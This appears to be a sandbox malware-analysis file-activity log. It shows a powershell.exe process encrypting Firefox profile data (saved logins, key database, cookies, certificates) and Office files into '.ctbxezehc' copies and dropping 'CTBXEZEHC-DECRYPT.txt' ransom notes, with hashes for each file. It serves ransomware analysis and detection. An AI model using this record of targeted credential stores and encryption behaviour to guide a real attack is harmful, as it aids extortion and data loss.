MD5: 4fd9bb298f588a8729eb728479e19be4
SHA256: cda4757b26bd2cca99c0797309a0b578f9d4a7e51f3dfaea810adf6007fa0a09
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\revocations.txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionCheckpoints.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\search.json.mozlz4
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\pluginreg.dat.ctbxezehc
binary
MD5: 4920826cd114ee2c5e96beee4605bcb6
SHA256: 3177cc312c7b3110b8feeae4130675eb0b3fc54817f71601b50cf0970fe7995c
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs.js.ctbxezehc
binary
MD5: cc7494f590e4befbcba95f9de7be783c
SHA256: c73f68abc42f7bdc8668d590524e1ddc436787197e7e434074983ce9d95a22d9
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs.js
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\pluginreg.dat
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\places.sqlite.ctbxezehc
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\places.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\permissions.sqlite.ctbxezehc
binary
MD5: b8f15f7b48f6d4085a1dc32243c7dc06
SHA256: 753c285476c7ca2b5ec354ba18631b9e58f274ca11f67dce65cbc94ad9009a4d
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\pkcs11.txt.ctbxezehc
binary
MD5: 2a5af37111d830be66cc203adb41ab5b
SHA256: 75c35ab9f05a0500f8b59ae2f20ed26b491e7744702f6f4029b5e2a8dc9e57e2
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\pkcs11.txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\permissions.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\logins.json.ctbxezehc
binary
MD5: 79bf8b7d5a18cc77a5dac161eeb5b598
SHA256: 6cdacecc08bc53fd4bcad9ec4173329cea94d03cdb574ebd82e2b0b86e94da3b
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\minidumps\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\logins.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\key4.db.ctbxezehc
binary
MD5: 640764df03357f7231104ac7556b4237
SHA256: 376febecbfcaf74ca7bb444a4eb23e6ffd35f318389b19c75473d48c7df6d5b0
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\handlers.json.ctbxezehc
binary
MD5: c435c89a576415962c2730dc961dc3dc
SHA256: 0c1dde9fd5ea6ab80d64321604ec6c52f2f6aaf94dd8346c2b8ce14ed75c0402
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\key4.db
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\handlers.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\widevinecdm.dll.sig.ctbxezehc
binary
MD5: 4a2d665934a478418b5e950d13da10d0
SHA256: 7aaa36555bb0c3bd10410e43a720268150730466456d07944ee0f70c88006b24
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\widevinecdm.dll.sig
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\widevinecdm.dll.lib.ctbxezehc
binary
MD5: 2fdff51935bc1d984b084de059b451c9
SHA256: 2ba298a2f32d5417f8f55908be1c9763b14845b3ead93247b7f56d21070865cd
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\manifest.json.ctbxezehc
gpg
MD5: 17389be71f3a96ec5989483fece83cb7
SHA256: 0cfdd417692a5afd962501f19ac4e2aef98d984d3e0a8e4f5bfe823347c15ee7
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\widevinecdm.dll.lib
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\manifest.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\LICENSE.txt.ctbxezehc
binary
MD5: adf30f39e8c6cf1165b30050c97cbe30
SHA256: 8efd42e219e0531d388fc9b8e203c91e920c77d912faab0e67ce5e99e6c40a3f
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\LICENSE.txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-gmpopenh264\1.7.1\gmpopenh264.info.ctbxezehc
binary
MD5: f5659db80f6c1c74624858ce67cf7b08
SHA256: 5b5a62274ee75b259e82fa6ef83f148fbbd1b65a42a6eea7237fc48f470e1071
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-gmpopenh264\1.7.1\gmpopenh264.info
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\formhistory.sqlite.ctbxezehc
binary
MD5: 4e21f5338eee4a168b87389ed4be1dda
SHA256: 1155e7e36cf30762e18fb341c4147144fe56a116dd95bec2d8453cf0b1c26789
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-gmpopenh264\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-gmpopenh264\1.7.1\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp\WINNT_x86-msvc\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\formhistory.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\favicons.sqlite.ctbxezehc
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\favicons.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\session-state.json.ctbxezehc
binary
MD5: 490a6349a9defa4b5c99aecba22438d5
SHA256: 85b32f57be08084ce074031a56fe00dce5d8b2506da5c3c5e3ec5f135262eca4
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\extensions.json.ctbxezehc
binary
MD5: cd30c95d02410b57abec6dbc73f8d550
SHA256: 616cef10536819271e510ec4c44311244f752f6473f8ac088d84d0bf6f42543d
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\1536511076670.6fb1a61f-96c8-4004-a260-a8d32e45a07f.main.jsonlz4.ctbxezehc
binary
MD5: 3bdbd75cba7d210460eb60313d506a73
SHA256: ed2d76088065ab9c2b0609c2ee92add7188f1614adc0cf47c7391ae1701b3d30
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\state.json.ctbxezehc
binary
MD5: 015c8f4992404d92a43f2cf142b21938
SHA256: 17b6b6f4901658435b4b9a34e945a8543fbb3a99db73ac9e4e8863712d880ecd
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\session-state.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\extensions.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\state.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535455254239.6a6d1f6c-b378-42bd-83d4-6375a8d83c94.main.jsonlz4.ctbxezehc
binary
MD5: e5c76dca9755088ad7ca56779bd933b8
SHA256: 6aa2147c9005e47c3c4181f78717e3b8ec0c086d89f830a9478f3b7dc1cbfa03
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\1536510464398.048632c6-c96b-486d-b119-7e1a7a9c9e9a.main.jsonlz4.ctbxezehc
binary
MD5: fdc78a6843f2fb963248eefc441c1657
SHA256: 621ce26f7504742a2009d9b1b65c533ebe2db88d2448a7707f7576c10a10ceee
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\1536510890757.0bd2c0b0-6051-4678-a27c-37f3c0a0c3bf.main.jsonlz4.ctbxezehc
binary
MD5: 8d8ca91c8a045c44f38087343da458a7
SHA256: 3fafe7c980b78ae6831a4ec000ea48aaaf795c4d114c894f7aeaf84feef9e420
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\1536511076670.6fb1a61f-96c8-4004-a260-a8d32e45a07f.main.jsonlz4
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535455254239.6a6d1f6c-b378-42bd-83d4-6375a8d83c94.main.jsonlz4
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\1536510464398.048632c6-c96b-486d-b119-7e1a7a9c9e9a.main.jsonlz4
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\1536510890757.0bd2c0b0-6051-4678-a27c-37f3c0a0c3bf.main.jsonlz4
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454589777.8901d324-d310-406e-8d96-2ba1529e4bea.first-shutdown.jsonlz4.ctbxezehc
binary
MD5: 75ce120567ba93db33c1990e0ee9c837
SHA256: 8581e11b8a29b912b7bfba6135e05607bd84ad946403ad44d4b5ab42ccd09c6e
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454589776.07f73e80-2b12-40ae-97b0-fa87f3167670.main.jsonlz4.ctbxezehc
binary
MD5: b7093b403e90098c798163ece19d7b96
SHA256: 034d30c63def3d86e723b00c258791458910a0c6fa0cc36abd00f444307c48ee
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454589777.8901d324-d310-406e-8d96-2ba1529e4bea.first-shutdown.jsonlz4
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454589776.07f73e80-2b12-40ae-97b0-fa87f3167670.main.jsonlz4
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454581431.ff499cec-8d4b-47de-a059-a9aea3d69a66.main.jsonlz4.ctbxezehc
binary
MD5: cb25eab152b15e74e5cae0c4f67a097e
SHA256: c2ec3a4480476e28b7186faa551957366d89bf71f47a595da7cacfd7f3567772
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454589752.05c13197-8f39-40a1-b976-59f6f9c1cc5f.new-profile.jsonlz4.ctbxezehc
binary
MD5: 1d6a04526cfa278c610c941af996bb04
SHA256: 1c2177edf4d8298f11b5ad836286f665357d551763549cb94add460bf7cf333a
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\crashes\store.json.mozlz4.ctbxezehc
binary
MD5: 99abcea11de80a3869798a83f242e409
SHA256: 7fc66469685d25295fa2393218f860b52ad567012d9d11c7b75eb0d7318a389c
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454581431.ff499cec-8d4b-47de-a059-a9aea3d69a66.main.jsonlz4
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454589752.05c13197-8f39-40a1-b976-59f6f9c1cc5f.new-profile.jsonlz4
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\crashes\store.json.mozlz4
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\crashes\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\content-prefs.sqlite.ctbxezehc
binary
MD5: f4417ab30ee400517a27cfbfb48f972d
SHA256: b3e5bc09469c03a0f40bda9439a35e785df1ce353a082e942067c36998e1d377
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cookies.sqlite.ctbxezehc
binary
MD5: a2e8f4468ef3aa0a47920f8950ce78e2
SHA256: b89aba17e1478fc29b4d3d2617bd89f8ada6a7045e515a4eb0abb2422c32e069
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\crashes\events\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cookies.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\content-prefs.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cert9.db.ctbxezehc
binary
MD5: 8faa1242a8fb3f20a94c258b49692749
SHA256: e8289e1519022682a491db4ba4ce2a3f1212f4bc46eb59115fee2537eb9f3b9a
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\compatibility.ini.ctbxezehc
binary
MD5: 9c76b03b6fac363f648e56545b8883e3
SHA256: cac45c12b6dfba7d1470955c3b8b9aff346137e5edf3f47a6bd76559f1c918bf
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\containers.json.ctbxezehc
binary
MD5: c5256d7622700ca8ce6d75ca158c220a
SHA256: daf639aaf989f14755ddc2ae89240cfaaab95a23c12212c6e5258d71761e7dbd
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cert9.db
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\containers.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\compatibility.ini
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\bookmarkbackups\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklists\plugins.json.ctbxezehc
binary
MD5: 16dc15d3b6171afcb4fd99eb56fc984e
SHA256: 096b4bad71ab4a07e74afff77b0bc7e402f4d0fe71e3daaa8e64349232f15e6a
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\bookmarkbackups\bookmarks-2018-08-28_14_uZyx1cMFmZ7ZpL4NneCk2A==.jsonlz4.ctbxezehc
binary
MD5: f20d788e842802da5abce6549c21a85c
SHA256: f8984b759061c1582da4244599c72fcaed7dae109c048b4880cad94eefa2c7f8
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklists\plugins.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\bookmarkbackups\bookmarks-2018-08-28_14_uZyx1cMFmZ7ZpL4NneCk2A==.jsonlz4
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklists\addons.json.ctbxezehc
binary
MD5: 70872a1ecabdd9419313f14c40a76ec6
SHA256: 11795769dd548d8899879abb0660356c21b26d3653dd2cfa5dfe2f67bf22a3ac
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklists\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklists\addons.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklist.xml.ctbxezehc
binary
MD5: f1269418b03651af185d964fdb4a22be
SHA256: 505a64292df06d5f5acf82699998d416b42288225696f5b561c3baf15685769e
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklist.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\addonStartup.json.lz4.ctbxezehc
binary
MD5: 87fea1e7c92a4c913de1cb35589ec5d7
SHA256: e40972e1bd0531bf270db73708625d1cd19940f49e58ee8208f569362eaa5c2b
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\addons.json.ctbxezehc
binary
MD5: af4c16a2d097525cd49778d475743f8c
SHA256: fbf67d6bf1b16fcfe53f1878622fc67aeec7b22f78469404fe0dddb9da7f3e0e
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Pending Pings\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20180807170231.ctbxezehc
binary
MD5: 1e86b7b915ed37fa8896d1bee8987f9a
SHA256: d03b0f5e9462c273cc929b61d233c68cf8b915da0513eecc6b3dafc86ae5a6fd
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\addons.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\addonStartup.json.lz4
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20180807170231
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Word\STARTUP\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Word\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Extensions\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC.ctbxezehc
mp3
MD5: dd97a297928d33cb8dc282b321aad61c
SHA256: 8074e1cf8f72124a3322b881c308ab23e03fdd626cd7a7a0e872f4469afba760
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Vault\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\UProof\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Access Parts\1033\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\NormalEmail.dotm.ctbxezehc
binary
MD5: ba4bfdab8224f974afa87e8e8584ffd5
SHA256: 499a89488c3f44138cd20fa8d02676a0eb7266660d3264c456048e163a6b4d79
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Access Parts\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
